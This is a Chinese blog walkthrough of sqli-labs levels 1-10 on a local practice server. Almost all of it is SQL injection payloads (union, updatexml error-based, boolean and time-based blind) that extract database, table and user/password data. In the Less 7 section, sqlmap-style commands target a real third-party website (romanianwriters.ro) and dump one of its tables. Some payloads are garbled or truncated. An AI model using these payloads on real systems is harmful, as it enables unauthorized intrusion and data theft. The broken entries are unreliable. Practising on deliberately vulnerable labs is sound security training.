SQL练习Less1-10题解

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接： https://blog.csdn.net/S123KO/article/details/100048575

SQL练习，用的自己装的服务器，127.0.0.1/sqli/Less-1

题解（部分的结果附在了后面）（看的时候注意，有些是答案附在了后面）

Less 1

联合查询

求列数

?id=1' order by 4%23

?id=1' order by 3%23（共3列）

求显示位

?id=1' and 1=2 union select 1,2,3%23

求数据库名

?id=1' and 1=2 union select 1,2,database()%23 security

?id=1' and 1=2 union select 1,database(),3%23 security

求表名

?id=1' and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'%23  emails,referers,uagents,users

求列名

?id=1' and 1=2 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name = 'users'%23 id,username,password

求字段内容

?id=1' and 1=2 union select 1,2,group_concat(username,0x23,password)from security.users%23

Dumb#Dumb,Angelina#I-kill-you,Dummy#p@ssword,secure#crappy,stupid#stupidity,superman#genious,batman#mob!le,admin#1,admin1#admin1,admin2#admin2,admin3#admin3,dhakkan#dumbo,admin4#admin4,admin'##a

Less 2

除了闭合字符是数字型，其余做法与Less 1相同

?id=1 and 1=1%23

?id=1 order by 3%23

?id=1 and 1=2 union select 1,2,3%23

?id=1 and 1=2 union select 1,2,database()%23

?id=1 and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'%23  emails,less42,referers,uagents,users 

?id=1 and 1=2 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name = 'users'%23 id,username,password

?id=1 and 1=2 union select 1,2,group_concat(username,0x23,password)from security.users%23

Less 3

基于报错的注入（xpath做法）

?id=1')and 1=1%23

求库名

?id=1')and updatexml(1,concat(0x23,database()),1)%23   security

求表名

?id=1')and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23  emails,less42,referers,uagents

求列名

?id=1')and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23 id,username,password

求字段

?id=1')and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23 Dumb#Dumb,Angelina#I-kill-you,D

Less 4

除了闭合字符是”）的以外，其余与Less 3相同

?id=1")and 1=1%23

?id=1")and updatexml(1,concat(0x23,database()),1)%23  security

?id=1")and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23

?id=1")and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23 

?id=1")and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23

Less 5

本题就是页面有所不同，但具体做法与Less 3相同

id=1'and 1=1%23

求库名

?id=1'and updatexml(1,concat(0x23,database()),1)%23

求表名

?id=1'and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23

求列名

?id=1'and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23

求字段内容

?id=1'and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23

Less 6

本体依然是xpath做法

id=1"and 1=1%23

求库名

s

求表名

?id=1"and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23

求列名

?id=1"and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23

求字段内容

?id=1"and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23

Less 7

此题与之前的题都不同，由于不会爆数据库表名等，所以可以根据数据库名、表名、列名、字段名的长度进行盲注

布尔型盲注

?id=1'))and 1=1%23

求数据库长度

?id=1')) and length(database())=8%23

求数据库名的ascii码

?id=1')) and ascii(substr(database(),1,1))=115%23   s

?id=1')) and ascii(substr(database(),2,1))=101%23   e

?id=1')) and ascii(substr(database(),3,1))=99%23     c

?id=1')) and ascii(substr(database(),4,1))=117%23    u

?id=1')) and ascii(substr(database(),5,1))=114%23    r

?id=1')) and ascii(substr(database(),6,1))=105%23    i

?id=1')) and ascii(substr(database(),7,1))=116%23    t

?id=1')) and ascii(substr(database(),8,1))=121%23    y

表的数量

id=1'))and (select count(table_name) from information_schema.tables where table_schema='security')=4%23

求表名的ascii码

id=1'))and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23

求列的数量

id=1'))and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23

求列名的ascii码

id=1'))and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105%23

求字段的数量

id=1'))and (select count(username) from security.users)=13%23

求字段名的内容

id=1'))and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23

表名、列名、字段名求的方法雷同，由于盲注很麻烦，所以做题时先考虑联合查询和xpath

用小葵软件测试简便方式：

如：

-u "http://www.romanianwriters.ro/s.php?id=1" --dbs

-u "http://www.romanianwriters.ro/s.php?id=1" --table -D "romanian_svc"

-u "http://www.romanianwriters.ro/s.php?id=1" --columns -T "ra_autori" -D "romanian_svc"

-u "http://www.romanianwriters.ro/s.php?id=1" --dump -C"autoportret,biografie,biografie_prev,id,nume,nume_nd" -T "ra_autori" -D "romanian_svc"

Less 8

与Less 7做法相同

?id=1'and 1=1%23

求数据库的长度

?id=1' and length(database())=8%23

求数据库的ascii的值

?id=1' and ascii(substr(database(),1,1))=115%23 s

?id=1' and ascii(substr(database(),2,1))=101%23 e

?id=1' and ascii(substr(database(),3,1))=99%23 c

?id=1' and ascii(substr(database(),4,1))=117%23 u

?id=1' and ascii(substr(database(),5,1))=114%23 r

?id=1' and ascii(substr(database(),6,1))=105%23 i

?id=1' and ascii(substr(database(),7,1))=116%23 t

?id=1' and ascii(substr(database(),8,1))=121%23 y

求表的数量

?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=4%23

求表的ascii码的值

?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23 e

?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109%23 m

求列的数量

id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23 

Less 9

基于时间的盲注

求数据库名的长度

?id=1' and if(length(database())=8,sleep(3),1) %23

求数据库名的ascii码

?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),2,1))=101,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),3,1))=99,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),4,1))=117,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),6,1))=105,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),7,1))=116,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),8,1))=121,sleep(5),1)%23

求表的数量

?id=1'and if(select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),1)%23

求列的数量

id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1)%23 

Less 10

与Less 9做法相同

?id=1"and if(length(database())=8,sleep(4),1) %23

之后还会逐渐发布后续地题目